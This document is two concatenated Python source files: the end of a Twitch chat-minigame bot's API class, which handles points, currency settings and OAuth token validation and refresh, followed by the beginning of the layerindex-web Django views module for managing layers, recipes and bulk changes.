await self.request_streamlabs_local_message(f'!add_points {user} {amount}')
return 'it worked, I guess'
raise ValueError(f"Unavailable Currency System: {self.currency_system}")
raise ValueError("Tokens not ready for use. Tell Razbi about this.")
async def upgraded_add_points(self, user: User, amount: int, session):
if amount > 0:
user.gain += amount
elif amount < 0:
user.lost -= amount
session.commit()
await self.add_points(user.name, amount)
def command(self, **kwargs):
return commands.command(registry=self.commands, **kwargs)
def group(self, **kwargs):
return commands.group(registry=self.commands, **kwargs)
@property
def name(self):
if self._name:
return self._name
if self.tokens_ready:
self._name = self.get_user()['data'][0]['login']
return self._name
@CachedProperty
def currency_system(self):
session = database.Session()
currency_system_db = session.query(database.Settings).get('currency_system')
if currency_system_db is not None:
res = currency_system_db.value
else:
res = ''
session.add(database.Settings(key='currency_system', value=''))
session.commit()
return res
def mark_dirty(self, setting):
if f'{setting}' in self._cache.keys():
del self._cache[setting]
def validate_twitch_token(self):
if not self.twitch_key:
return False
url = 'https://id.twitch.tv/oauth2/validate'
querystring = {'Authorization': f'OAuth {self.twitch_key}'}
res = requests.get(url=url, headers=querystring)
if res.status_code == 200:
self.twitch_key_requires_refreshing = False
return True
elif res.status_code == 401:
if not self.twitch_key_requires_refreshing:
print("Twitch Token expired. Refreshing Token whenever possible...")
self.twitch_key_requires_refreshing = True
return False
raise ValueError(
f"A response code appeared that Razbi didn't handle when validating a twitch token, maybe tell him? Response Code: {res.status_code}")
def validate_stream_elements_key(self):
if not self.stream_elements_key:
return False
url = 'https://api.streamelements.com/oauth2/validate'
querystring = {'Authorization': f'OAuth {self.twitch_key}'}
res = requests.get(url=url, headers=querystring)
if res.status_code == 200:
self.stream_elements_key_requires_refreshing = False
return True
elif res.status_code == 401:
print("Stream_elements Token expired. Refreshing Token whenever possible...")
self.stream_elements_key_requires_refreshing = True
return False
elif res.status_code >= 500:
print("server errored or... something. better tell Razbi")
return False
raise ValueError(
f"A response code appeared that Razbi didn't handle when validating a stream_elements token, maybe tell him? Response Code: {res.status_code}")
@property
def tokens_ready(self):
if 'tokens_ready' in self._cache:
return self._cache['tokens_ready']
if self.currency_system and self.twitch_key and self.validate_twitch_token():
if self.currency_system == 'streamlabs' and self.streamlabs_key or \
self.currency_system == 'stream_elements' and self.stream_elements_key:
self._cache['tokens_ready'] = True
return True
if self.currency_system == 'streamlabs_local':
self._cache['tokens_ready'] = True
# self.send_chat_message('!connect_minigame')
# print("connected")
return True
return False
@CachedProperty
def stream_elements_id(self):
if self.tokens_ready:
session = database.Session()
stream_elements_id_db = session.query(database.Settings).get('stream_elements_id')
if stream_elements_id_db:
return stream_elements_id_db.value
url = f'https://api.streamelements.com/kappa/v2/channels/{self.name}'
headers = {'accept': 'application/json'}
res = requests.get(url, headers=headers)
if res.status_code == 200:
stream_elements_id = res.json()['_id']
session.add(database.Settings(key='stream_elements_id', value=stream_elements_id))
return stream_elements_id
@CachedProperty
def twitch_key_expires_at(self):
session = database.Session()
expires_at_db = session.query(database.Settings).get('twitch_key_expires_at')
if expires_at_db:
expires_at = int(expires_at_db.value)
return expires_at
@CachedProperty
def stream_elements_key_expires_at(self):
session = database.Session()
expires_at_db = session.query(database.Settings).get('stream_elements_key_expires_at')
if expires_at_db:
expires_at = int(expires_at_db.value)
return expires_at
async def twitch_key_auto_refresher(self):
while True:
if self.tokens_ready and self.twitch_key_expires_at and time.time() + 60 > self.twitch_key_expires_at:
url = 'https://razbi.funcity.org/stocks-chat-minigame/twitch/refresh_token'
querystring = {'access_token': self.twitch_key}
res = requests.get(url, params=querystring)
if res.status_code == 200:
session = database.Session()
twitch_key_db = session.query(database.Settings).get('twitch_key')
if twitch_key_db:
twitch_key_db.value = res.json()['access_token']
expires_at_db = session.query(database.Settings).get('twitch_key_expires_at')
if expires_at_db:
expires_at_db.value = str(int(time.time()) + res.json()['expires_in'])
self.mark_dirty('twitch_key_expires_at')
session.commit()
print("Twitch key refreshed successfully.")
elif res.status_code == 500:
print(
"Tried refreshing the twitch token, but the server is down or smth, please tell Razbi about this. ")
else:
raise ValueError('Unhandled status code when refreshing the twitch key. TELL RAZBI',
res.status_code)
elif self.tokens_ready and self.currency_system == 'stream_elements' and \
self.stream_elements_key_expires_at and time.time() + 60 > self.stream_elements_key_expires_at:
url = 'https://razbi.funcity.org/stocks-chat-minigame/stream_elements/refresh_token'
querystring = {'access_token': self.stream_elements_key}
res = requests.get(url, params=querystring)
if res.status_code == 200:
session = database.Session()
stream_element_key_db = session.query(database.Settings).get('stream_elements_key')
if stream_element_key_db:
stream_element_key_db.value = res.json()['access_token']
expires_at_db = session.query(database.Settings).get('stream_elements_key_expires_at')
if expires_at_db:
expires_at_db.value = str(int(time.time()) + res.json()['expires_in'])
self.mark_dirty('stream_elements_key_expires_at')
session.commit()
print("Stream_elements key refreshed successfully.")
elif res.status_code == 500:
print(
"Tried refreshing the stream_elements token, but the server is down or smth, please tell Razbi about this. ")
else:
raise ValueError('Unhandled status code when refreshing the stream_elements key. TELL RAZBI',
res.status_code)
await asyncio.sleep(60)
async def ping_streamlabs_local(self):
self.send_chat_message('!connect_minigame')
await self.request_streamlabs_local_message(f'!get_user_points {self.name}')
async def request_streamlabs_local_message(self, message: str):
async with self.streamlabs_local_buffer_lock:
self.streamlabs_local_send_buffer = message
self.streamlabs_local_send_buffer_event.set()
await self.streamlabs_local_receive_buffer_event.wait()
self.streamlabs_local_receive_buffer_event.clear()
response = self.streamlabs_local_receive_buffer
return response
def get_and_format(self, ctx: contexts.UserContext, message_name: str, **formats):
if message_name not in self.overlord.messages:
default_messages = load_message_templates()
if message_name in default_messages:
self.overlord.messages[message_name] = default_messages[message_name]
else:
return ''
return self.overlord.messages[message_name].format(stocks_alias=self.overlord.messages['stocks_alias'],
company_alias=self.overlord.messages['company_alias'],
user_name=ctx.user.name,
currency_name=self.overlord.currency_name,
stocks_limit=f'{self.overlord.max_stocks_owned:,}',
**formats)
def load_command_names(self):
# self.command_names = {('acquire', None): 'buy', ('my', None): 'my', ('income', 'my'): 'income'}
session = database.Session()
command_names = session.query(database.Settings).get('command_names')
if command_names:
self.command_names = BidirectionalMap(ast.literal_eval(command_names.value))
default_command_names = load_command_names()
for key in default_command_names:
if key not in self.command_names or self.command_names[key] != default_command_names[key]:
self.command_names[key] = default_command_names[key]
else:
self.command_names = load_command_names()
# command_names = database.Settings(key='command_names', value=repr(self.command_names))
# session.add(command_names)
# session.commit()
if __name__ == '__main__':
api = API()
loop = asyncio.get_event_loop()
# api = API()
# print(api.get_user('razbith3player'))
# print(api.get_points('nerzul007'))
# print(api.twitch_key)
try:
loop.run_until_complete(api.start_read_chat())
finally:
loop.stop()
# print(type(api.twitch_key))
# api.read_chat()
# loop.run_until_complete(api.read_chat())
# just FYI, if you plan on testing just API alone, do it in the Overlord.py, not here
|
<gh_stars>1-10
# layerindex-web - view definitions
#
# Copyright (C) 2013-2018 Intel Corporation
#
# Licensed under the MIT license, see COPYING.MIT for details
import os
import sys
import re
from datetime import datetime
from itertools import islice
import reversion
from django import forms
from django.contrib import messages
from django.contrib.auth import logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.hashers import make_password
from django.contrib.auth.models import Permission, User
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib.sites.models import Site
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import resolve, reverse, reverse_lazy
from django.db import transaction
from django.db.models import Count, Q
from django.db.models.functions import Lower
from django.db.models.query import QuerySet
from django.db.models.signals import pre_save
from django.dispatch import receiver
from django.http import Http404, HttpResponse, HttpResponseRedirect
from django.shortcuts import get_list_or_404, get_object_or_404, render
from django.template.loader import get_template
from django.utils.decorators import method_decorator
from django.utils.html import escape
from django.views.decorators.cache import never_cache
from django.views.generic import DetailView, ListView, TemplateView
from django.views.generic.base import RedirectView
from django.views.generic.edit import (CreateView, DeleteView, FormView,
UpdateView)
from django_registration.backends.activation.views import RegistrationView
from pkg_resources import parse_version
from reversion.models import Revision
import settings
from layerindex.forms import (AdvancedRecipeSearchForm, BulkChangeEditFormSet,
ClassicRecipeForm, ClassicRecipeSearchForm,
ComparisonRecipeSelectForm, EditLayerForm,
EditNoteForm, EditProfileForm,
LayerMaintainerFormSet, RecipeChangesetForm,
PatchDispositionForm, PatchDispositionFormSet)
from layerindex.models import (BBAppend, BBClass, Branch, ClassicRecipe,
Distro, DynamicBuildDep, IncFile, LayerBranch,
LayerDependency, LayerItem, LayerMaintainer,
LayerNote, LayerUpdate, Machine, Patch, Recipe,
RecipeChange, RecipeChangeset, Source, StaticBuildDep,
Update, SecurityQuestion, SecurityQuestionAnswer,
UserProfile, PatchDisposition)
from . import tasks, utils
sys.path.insert(0, os.path.abspath(os.path.dirname(__file__)))
def edit_layernote_view(request, template_name, slug, pk=None):
layeritem = get_object_or_404(LayerItem, name=slug)
if layeritem.comparison:
raise Http404
if not (request.user.is_authenticated() and (request.user.has_perm('layerindex.publish_layer') or layeritem.user_can_edit(request.user))):
raise PermissionDenied
if pk:
# Edit mode
layernote = get_object_or_404(LayerNote, pk=pk)
else:
# Add mode
layernote = LayerNote()
layernote.layer = layeritem
if request.method == 'POST':
form = EditNoteForm(request.POST, instance=layernote)
if form.is_valid():
form.save()
return HttpResponseRedirect(layeritem.get_absolute_url())
else:
form = EditNoteForm(instance=layernote)
return render(request, template_name, {
'form': form,
})
def delete_layernote_view(request, template_name, slug, pk):
layeritem = get_object_or_404(LayerItem, name=slug)
if layeritem.comparison:
raise Http404
if not (request.user.is_authenticated() and (request.user.has_perm('layerindex.publish_layer') or layeritem.user_can_edit(request.user))):
raise PermissionDenied
layernote = get_object_or_404(LayerNote, pk=pk)
if request.method == 'POST':
layernote.delete()
return HttpResponseRedirect(layeritem.get_absolute_url())
else:
return render(request, template_name, {
'object': layernote,
'object_type': layernote._meta.verbose_name,
'cancel_url': layeritem.get_absolute_url()
})
def delete_layer_view(request, template_name, slug):
layeritem = get_object_or_404(LayerItem, name=slug)
if layeritem.comparison:
raise Http404
if not (request.user.is_authenticated() and request.user.has_perm('layerindex.publish_layer') and layeritem.status == 'N'):
raise PermissionDenied
if request.method == 'POST':
layeritem.delete()
return HttpResponseRedirect(reverse('layer_list', args=('master',)))
else:
return render(request, template_name, {
'object': layeritem,
'object_type': layeritem._meta.verbose_name,
'cancel_url': layeritem.get_absolute_url()
})
def edit_layer_view(request, template_name, branch='master', slug=None):
return_url = None
branchobj = Branch.objects.filter(name=branch)[:1].get()
if slug:
# Edit mode
layeritem = get_object_or_404(LayerItem, name=slug)
if layeritem.comparison:
raise Http404
if not (request.user.is_authenticated() and (request.user.has_perm('layerindex.publish_layer') or layeritem.user_can_edit(request.user))):
raise PermissionDenied
layerbranch = get_object_or_404(LayerBranch, layer=layeritem, branch=branchobj)
old_maintainers = list(layerbranch.layermaintainer_set.values_list('email', flat=True))
deplistlayers = LayerItem.objects.filter(comparison=False).exclude(id=layeritem.id).order_by('name')
returnto = request.GET.get('returnto', 'layer_item')
if returnto:
if returnto == 'layer_review':
return_url = reverse_lazy(returnto, args=(layeritem.name,))
else:
return_url = reverse_lazy(returnto, args=(branch, layeritem.name))
else:
# Submit mode
layeritem = LayerItem()
layerbranch = LayerBranch(layer=layeritem, branch=branchobj)
deplistlayers = LayerItem.objects.filter(comparison=False).order_by('name')
allow_base_type = request.user.has_perm('layerindex.publish_layer') or layeritem.layer_type == 'A'
if request.method == 'POST':
last_vcs_url = layeritem.vcs_url
form = EditLayerForm(request.user, layerbranch, allow_base_type, request.POST, instance=layeritem)
maintainerformset = LayerMaintainerFormSet(request.POST, instance=layerbranch)
if form.is_valid() and maintainerformset.is_valid():
with transaction.atomic():
reset_last_rev = False
form.save()
layerbranch.layer = layeritem
new_subdir = form.cleaned_data['vcs_subdir']
if layerbranch.vcs_subdir != new_subdir:
layerbranch.vcs_subdir = new_subdir
reset_last_rev = True
layerbranch.save()
maintainerformset.save()
if slug:
new_deps = form.cleaned_data['deps']
existing_deps = [deprec.dependency for deprec in layerbranch.dependencies_set.all()]
reset_last_rev = False
for dep in new_deps:
if dep not in existing_deps:
deprec = LayerDependency()
deprec.layerbranch = layerbranch
deprec.dependency = dep
deprec.save()
reset_last_rev = True
for dep in existing_deps:
if dep not in new_deps:
layerbranch.dependencies_set.filter(dependency=dep).delete()
reset_last_rev = True
if layeritem.vcs_url != last_vcs_url:
reset_last_rev = True
if reset_last_rev:
layerbranch.vcs_last_rev = ''
layerbranch.save()
else:
# Save dependencies
for dep in form.cleaned_data['deps']:
deprec = LayerDependency()
deprec.layerbranch = layerbranch
deprec.dependency = dep
deprec.save()
# Send email
plaintext = get_template('layerindex/submitemail.txt')
perm = Permission.objects.get(codename='publish_layer')
users = User.objects.filter(Q(groups__permissions=perm) | Q(user_permissions=perm) ).distinct()
for user in users:
if user.first_name:
user_name = user.first_name
else:
user_name = user.username
layer_url = request.build_absolute_uri(reverse('layer_review', args=(layeritem.name,)))
if getattr(settings, 'FORCE_REVIEW_HTTPS', False) and layer_url.startswith('http:'):
layer_url = 'https:' + layer_url.split(':', 1)[1]
d = {
'user_name': user_name,
'layer_name': layeritem.name,
'layer_url': layer_url,
}
subject = '%s - %s' % (settings.SUBMIT_EMAIL_SUBJECT, layeritem.name)
from_email = settings.SUBMIT_EMAIL_FROM
to_email = user.email
text_content = plaintext.render(d)
tasks.send_email.apply_async((subject, text_content, from_email, [to_email]))
return HttpResponseRedirect(reverse('submit_layer_thanks'))
# Email any new maintainers (that aren't us)
new_maintainers = layerbranch.layermaintainer_set.exclude(email__in=old_maintainers + [request.user.email])
if new_maintainers:
for maintainer in new_maintainers:
layer_url = request.build_absolute_uri(reverse('layer_item', args=(layerbranch.branch.name, layeritem.name,)))
subjecttext = get_template('layerindex/maintemailsubject.txt')
bodytext = get_template('layerindex/maintemail.txt')
from_email = settings.SUBMIT_EMAIL_FROM
# create subject from subject template
d = {
'layer_name': layeritem.name,
'site_name': request.META['HTTP_HOST'],
}
subject = subjecttext.render(d).rstrip()
#create body from body template
d = {
'maintainer_name': maintainer.name,
'layer_name': layeritem.name,
'layer_url': layer_url,
'help_contact': _get_help_contact(),
}
body = bodytext.render(d)
tasks.send_email.apply_async((subject, body, from_email, [maintainer.email]))
messages.success(request, 'Layer %s saved successfully.' % layeritem.name)
if return_url:
if returnto == 'layer_review':
return_url = reverse_lazy(returnto, args=(layeritem.name,))
else:
return_url = reverse_lazy(returnto, args=(branch, layeritem.name))
return HttpResponseRedirect(return_url)
else:
form = EditLayerForm(request.user, layerbranch, allow_base_type, instance=layeritem)
maintainerformset = LayerMaintainerFormSet(instance=layerbranch)
return render(request, template_name, {
'form': form,
'maintainerformset': maintainerformset,
'deplistlayers': deplistlayers,
'allow_base_type': allow_base_type,
'return_url': return_url,
})
def bulk_change_edit_view(request, template_name, pk):
changeset = get_object_or_404(RecipeChangeset, pk=pk)
if request.method == 'POST':
formset = BulkChangeEditFormSet(request.POST, queryset=changeset.recipechange_set.all())
if formset.is_valid():
formset.save()
return HttpResponseRedirect(reverse('bulk_change_review', args=(changeset.id,)))
else:
formset = BulkChangeEditFormSet(queryset=changeset.recipechange_set.all())
return render(request, template_name, {
'formset': formset,
})
def bulk_change_patch_view(request, pk):
changeset = get_object_or_404(RecipeChangeset, pk=pk)
# FIXME this couples the web server and machine running the update script together,
# but given that it's a separate script the way is open to decouple them in future
try:
ret = utils.runcmd([sys.executable, 'bulkchange.py', str(int(pk)), settings.TEMP_BASE_DIR], os.path.dirname(__file__), shell=False)
if ret:
fn = ret.splitlines()[-1]
if os.path.exists(fn):
if fn.endswith('.tar.gz'):
mimetype = 'application/x-gzip'
else:
mimetype = 'text/x-diff'
response = HttpResponse(content_type=mimetype)
response['Content-Disposition'] = 'attachment; filename="%s"' % os.path.basename(fn)
with open(fn, "rb") as f:
data = f.read()
response.write(data)
os.remove(fn)
return response
return HttpResponse('No patch data generated', content_type='text/plain')
except Exception as e:
output = getattr(e, 'output', None)
if output:
if 'timeout' in output:
return HttpResponse('Failed to generate patches: timed out waiting for lock. Please try again shortly.', content_type='text/plain')
else:
return HttpResponse('Failed to generate patches: %s' % output, content_type='text/plain')
return HttpResponse('Failed to generate patches: %s' % e, content_type='text/plain')
# FIXME better error handling
def _check_url_branch(kwargs):
branchname = kwargs['branch']
if branchname:
if branchname == 'oe-classic':
raise Http404
branch = get_object_or_404(Branch, name=branchname)
def _get_help_contact():
# find appropriate help contact
help_contact = None
for user in User.objects.all():
if user.username != 'root' and (user.is_staff or user.is_superuser) and user.is_active:
help_contact = user
break
return help_contact
def publish_view(request, name):
if not (request.user.is_authenticated() and request.user.has_perm('layerindex.publish_layer')):
raise PermissionDenied
if getattr(settings, 'SEND_PUBLISH_EMAIL', True):
layeritem = get_object_or_404(LayerItem, name=name)
layerbranch = get_object_or_404(LayerBranch, layer=layeritem)
layer_url = request.build_absolute_uri(reverse('layer_item', args=(layerbranch.branch, layeritem.name)))
maintainers = get_list_or_404(LayerMaintainer, layerbranch=layerbranch)
from_email = settings.SUBMIT_EMAIL_FROM
subjecttext = get_template('layerindex/publishemailsubject.txt')
bodytext = get_template('layerindex/publishemail.txt')
maintainer_names = [m.name for m in maintainers]
# create subject from subject template
d = {
'layer_name': layeritem.name,
'site_name': request.META['HTTP_HOST'],
}
subject = subjecttext.render(d).rstrip()
#create body from body template
d = {
'maintainers': maintainer_names,
'layer_name': layeritem.name,
'layer_url': layer_url,
'help_contact': _get_help_contact(),
}
body = bodytext.render(d)
tasks.send_email.apply_async((subject, body, from_email, [m.email for m in maintainers]))
return _statuschange(request, name, 'P')
def _statuschange(request, name, newstatus):
w = get_object_or_404(LayerItem, name=name)
if w.comparison:
raise Http404
if w.status != newstatus:
w.change_status(newstatus, request.user.username)
w.save()
return HttpResponseRedirect(w.get_absolute_url())
class RedirectParamsView(RedirectView):
def get_redirect_url(self, *args, **kwargs):
redirect_name = kwargs.pop('redirect_name')
return reverse_lazy(redirect_name, args=args, kwargs=kwargs)
class LayerListView(ListView):
context_object_name = 'layerbranch_list'
def get_queryset(self):
_check_url_branch(self.kwargs)
return LayerBranch.objects.filter(branch__name=self.kwargs['branch']).filter(layer__status__in=['P', 'X']).order_by('layer__layer_type', '-layer__index_preference', 'layer__name')
def get_context_data(self, **kwargs):
context = super(LayerListView, self).get_context_data(**kwargs)
context['url_branch'] = self.kwargs['branch']
context['this_url_name'] = resolve(self.request.path_info).url_name
context['layer_type_choices'] = LayerItem.LAYER_TYPE_CHOICES
return context
class LayerReviewListView(ListView):
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
if not request.user.has_perm('layerindex.publish_layer'):
raise PermissionDenied
return super(LayerReviewListView, self).dispatch(request, *args, **kwargs)
def get_queryset(self):
return LayerBranch.objects.filter(branch__name='master').filter(layer__status='N').order_by('layer__name')
class LayerDetailView(DetailView):
model = LayerItem
slug_field = 'name'
# This is a bit of a mess. Surely there has to be a better way to handle this...
def dispatch(self, request, *args, **kwargs):
self.user = request.user
res = super(LayerDetailView, self).dispatch(request, *args, **kwargs)
l = self.get_object()
if l:
if l.comparison:
raise Http404
if l.status == 'N':
if not (request.user.is_authenticated() and request.user.has_perm('layerindex.publish_layer')):
raise PermissionDenied
return res
def get_context_data(self, **kwargs):
_check_url_branch(self.kwargs)
context = super(LayerDetailView, self).get_context_data(**kwargs)
layer = context['layeritem']
context['useredit'] = layer.user_can_edit(self.user)
layerbranch = layer.get_layerbranch(self.kwargs['branch'])
if layerbranch:
context['layerbranch'] = layerbranch
context['machines'] = layerbranch.machine_set.order_by('name')
context['distros'] = layerbranch.distro_set.order_by('name')
context['appends'] = layerbranch.bbappend_set.order_by('filename')
context['classes'] = layerbranch.bbclass_set.order_by('name')
context['updates'] = LayerUpdate.objects.filter(layer=layerbranch.layer, branch=layerbranch.branch).order_by('-started')
context['url_branch'] = self.kwargs['branch']
context['this_url_name'] = resolve(self.request.path_info).url_name
if 'rrs' in settings.INSTALLED_APPS:
from rrs.models import MaintenancePlanLayerBranch
# We don't care about branch, only that the layer is included
context['rrs_maintplans'] = [m.plan for m in MaintenancePlanLayerBranch.objects.filter(layerbranch__layer=layer)]
return context
class LayerReviewDetailView(LayerDetailView):
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
if not request.user.has_perm('layerindex.publish_layer'):
raise PermissionDenied
return super(LayerReviewDetailView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
self.kwargs['branch'] = 'master'
context = super(LayerReviewDetailView, self).get_context_data(**kwargs)
return context
def recipes_preferred_count(qs):
# Add extra column so we can show "duplicate" recipes from other layers de-emphasised
# (it's a bit crude having to do this using SQL but I couldn't find a better way...)
return qs.extra(
select={
'preferred_count': """SELECT COUNT(1)
FROM layerindex_recipe AS recipe2
, layerindex_layerbranch as branch2
, layerindex_layeritem as layer1
, layerindex_layeritem as layer2
WHERE branch2.id = recipe2.layerbranch_id
AND layer2.id = branch2.layer_id
AND layer2.layer_type in ('S', 'A')
AND branch2.branch_id = layerindex_layerbranch.branch_id
AND recipe2.pn = layerindex_recipe.pn
AND recipe2.layerbranch_id <> layerindex_recipe.layerbranch_id
AND layer1.id = layerindex_layerbranch.layer_id
AND layer2.index_preference > layer1.index_preference
"""
},
)
class RecipeSearchView(ListView):
context_object_name = 'recipe_list'
paginate_by = 50
def render_to_response(self, context, **kwargs):
if len(self.object_list) == 1:
return HttpResponseRedirect(reverse('recipe', args=(self.object_list[0].id,)))
else:
return super(ListView, self).render_to_response(context, **kwargs)
def search_recipe_query(self, init_qs, query_string, preferred=True):
"""Do a prioritised search using the specified keyword (if any)"""
# Lower() here isn't needed for OE recipes since we don't use uppercase
# but we use this same code for "recipes" from other distros where
# they do
order_by = (Lower('pn'), 'layerbranch__layer')
filtered = False
if query_string.strip():
# First search by exact name
qs0 = init_qs.filter(pn=query_string).order_by(*order_by)
if preferred:
qs0 = recipes_preferred_count(qs0)
# Then keyword somewhere in the name
entry_query = utils.string_to_query(query_string, ['pn'])
qs1 = init_qs.filter(entry_query).order_by(*order_by)
if preferred:
qs1 = recipes_preferred_count(qs1)
# Then keyword somewhere in summary or description
entry_query = utils.string_to_query(query_string, ['description', 'summary'])
qs2 = init_qs.filter(entry_query).order_by(*order_by)
if preferred:
qs2 = recipes_preferred_count(qs2)
# Now chain the results together and drop any duplicates (e.g.
# if the keyword matched in the name and summary)
qs = list(utils.chain_unique(qs0, qs1, qs2))
filtered = True
elif 'q' in self.request.GET:
# User clicked search with no query string, return all records
qs = init_qs.order_by(*order_by)
if preferred:
qs = list(recipes_preferred_count(qs))
else:
# It's a bit too slow to return all records by default, and most people
# won't actually want that (if they do they can just hit the search button
# with no query string)
qs = Recipe.objects.none()
return qs, filtered
def get_queryset(self):
_check_url_branch(self.kwargs)
query_string = self.request.GET.get('q', '')
init_qs = Recipe.objects.filter(layerbranch__branch__name=self.kwargs['branch'])
# Support slightly crude search on inherits field
query_items = query_string.split()
inherits = []
query_terms = []
for item in query_items:
if item.startswith('inherits:'):
inherits.append(item.split(':')[1])
# support searches by build dependencies
elif item.startswith('depends:'):
depsearch = item.split(':')[1]
qobj = Q(pk__in=[])
static_build_dependencies = StaticBuildDep.objects.filter(name=depsearch).first()
dynamic_build_dependencies = DynamicBuildDep.objects.filter(name=depsearch).first()
if static_build_dependencies:
qobj |= Q(staticbuilddep=static_build_dependencies)
if dynamic_build_dependencies:
qobj |= Q(dynamicbuilddep=dynamic_build_dependencies)
init_qs = init_qs.filter(qobj).distinct()
# support searches by layer name
elif item.startswith('layer:'):
query_layername = item.split(':')[1].strip().lower()
if not query_layername:
messages.add_message(self.request, messages.ERROR, 'The \
layer name is expected to follow the \"layer:\" prefix without any spaces.')
else:
query_layer = LayerItem.objects.filter(
name=query_layername)
if query_layer:
init_qs = init_qs.filter(
layerbranch__layer=query_layer[0])
else:
messages.add_message(self.request, messages.ERROR,
'No layer \"%s\" was found.'
% query_layername)
else:
query_terms.append(item)
if inherits:
# FIXME This is a bit ugly, perhaps we should consider having this as a one-many relationship instead
for inherit in inherits:
init_qs = init_qs.filter(Q(inherits=inherit) | Q(inherits__startswith=inherit + ' ') | Q(inherits__endswith=' ' + inherit) | Q(inherits__contains=' %s ' % inherit))
query_string = ' '.join(query_terms)
qs, _ = self.search_recipe_query(init_qs, query_string, preferred=False)
return qs
def get_context_data(self, **kwargs):
context = super(RecipeSearchView, self).get_context_data(**kwargs)
searchval = self.request.GET.get('q', '')
context['search_keyword'] = searchval
context['url_branch'] = self.kwargs['branch']
context['this_url_name'] = resolve(self.request.path_info).url_name
if searchval:
context['extra_url_param'] = '?q=%s' % searchval
return context
class DuplicatesView(TemplateView):
def get_recipes(self, layer_ids):
init_qs = Recipe.objects.filter(layerbranch__branch__name=self.kwargs['branch'])
if layer_ids:
init_qs = init_qs.filter(layerbranch__layer__in=layer_ids)
dupes = init_qs.values('pn').annotate(Count('layerbranch', distinct=True)).filter(layerbranch__count__gt=1)
qs = init_qs.all().filter(pn__in=[item['pn'] for item in dupes]).order_by('pn', 'layerbranch__layer', '-pv')
return recipes_preferred_count(qs)
def get_classes(self, layer_ids):
init_qs = BBClass.objects.filter(layerbranch__branch__name=self.kwargs['branch'])
if layer_ids:
init_qs = init_qs.filter(layerbranch__layer__in=layer_ids)
dupes = init_qs.values('name').annotate(Count('layerbranch', distinct=True)).filter(layerbranch__count__gt=1)
qs = init_qs.all().filter(name__in=[item['name'] for item in dupes]).order_by('name', 'layerbranch__layer')
return qs
def get_incfiles(self, layer_ids):
init_qs = IncFile.objects.filter(layerbranch__branch__name=self.kwargs['branch'])
if layer_ids:
init_qs = init_qs.filter(layerbranch__layer__in=layer_ids)
dupes = init_qs.values('path').annotate(Count('layerbranch', distinct=True)).filter(layerbranch__count__gt=1)
qs = init_qs.all().filter(path__in=[item['path'] for item in dupes]).order_by('path', 'layerbranch__layer')
return qs
def get_context_data(self, **kwargs):
layer_ids = [int(i) for i in self.request.GET.getlist('l')]
context = super(DuplicatesView, self).get_context_data(**kwargs)
context['recipes'] = self.get_recipes(layer_ids)
context['classes'] = self.get_classes(layer_ids)
context['incfiles'] = self.get_incfiles(layer_ids)
context['url_branch'] = self.kwargs['branch']
context['this_url_name'] = resolve(self.request.path_info).url_name
context['layers'] = LayerBranch.objects.filter(branch__name=self.kwargs['branch']).filter(layer__status__in=['P', 'X']).order_by( 'layer__name')
context['showlayers'] = layer_ids
return context
class AdvancedRecipeSearchView(ListView):
context_object_name = 'recipe_list'
paginate_by = 50
def get_queryset(self):
field = self.request.GET.get('field', '')
if field:
search_form = AdvancedRecipeSearchForm(self.request.GET)
if not search_form.is_valid():
return Recipe.objects.none()
match_type = self.request.GET.get('match_type', '')
if match_type == 'B':
value = ''
else:
value = self.request.GET.get('value', '')
if value or match_type == 'B':
if match_type == 'C' or match_type == 'N':
query = Q(**{"%s__icontains" % field: value})
else:
query = Q(**{"%s" % field: value})
queryset = Recipe.objects.filter(layerbranch__branch__name='master')
layer = self.request.GET.get('layer', '')
if layer:
queryset = queryset.filter(layerbranch__layer=layer)
if match_type == 'N':
# Exclude blank as well
queryset = queryset.exclude(Q(**{"%s" % field: ''})).exclude(query)
else:
queryset = queryset.filter(query)
return queryset.order_by('pn', 'layerbranch__layer')
return Recipe.objects.none()
def get_context_data(self, **kwargs):
context = super(AdvancedRecipeSearchView, self).get_context_data(**kwargs)
if self.request.GET.get('field', ''):
searched = True
search_form = AdvancedRecipeSearchForm(self.request.GET)
else:
searched = False
search_form = AdvancedRecipeSearchForm()
context['search_form'] = search_form
context['searched'] = searched
return context
class BulkChangeView(CreateView):
model = RecipeChangeset
form_class = RecipeChangesetForm
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(BulkChangeView, self).dispatch(request, *args, **kwargs)
def form_valid(self, form):
if not self.request.user.is_authenticated():
raise PermissionDenied
obj = form.save(commit=False)
obj.user = self.request.user
obj.save()
return HttpResponseRedirect(reverse('bulk_change_search', args=(obj.id,)))
def get_context_data(self, **kwargs):
context = super(BulkChangeView, self).get_context_data(**kwargs)
context['changesets'] = RecipeChangeset.objects.filter(user=self.request.user)
return context
class BulkChangeSearchView(AdvancedRecipeSearchView):
def get(self, request, *args, **kwargs):
self.changeset = get_object_or_404(RecipeChangeset, pk=kwargs['pk'])
if self.changeset.user != request.user:
raise PermissionDenied
return super(BulkChangeSearchView, self).get(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
if not request.user.is_authenticated():
raise PermissionDenied
changeset = get_object_or_404(RecipeChangeset, pk=kwargs['pk'])
if changeset.user != request.user:
raise PermissionDenied
def add_recipes(recipes):
for recipe in recipes:
if not changeset.recipechange_set.filter(recipe=recipe):
change = RecipeChange()
change.changeset = changeset
change.recipe = recipe
change.reset_fields()
change.save()
if 'add_selected' in request.POST:
id_list = request.POST.getlist('selecteditems')
id_list = [int(i) for i in id_list if i.isdigit()]
recipes = Recipe.objects.filter(id__in=id_list)
add_recipes(recipes)
elif 'add_all' in request.POST:
add_recipes(self.get_queryset())
elif 'remove_all' in request.POST:
changeset.recipechange_set.all().delete()
return self.get(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(BulkChangeSearchView, self).get_context_data(**kwargs)
context['changeset'] = self.changeset
context['current_branch'] = 'master'
return context
class BaseDeleteView(DeleteView):
def get_context_data(self, **kwargs):
context = super(BaseDeleteView, self).get_context_data(**kwargs)
obj = context.get('object', None)
if obj:
context['object_type'] = obj._meta.verbose_name
cancel = self.request.GET.get('cancel', '')
if cancel:
context['cancel_url'] = reverse_lazy(cancel, args=(obj.pk,))
return context
class BulkChangeDeleteView(BaseDeleteView):
model = RecipeChangeset
success_url = reverse_lazy('bulk_change')
def get_queryset(self):
qs = super(BulkChangeDeleteView, self).get_queryset()
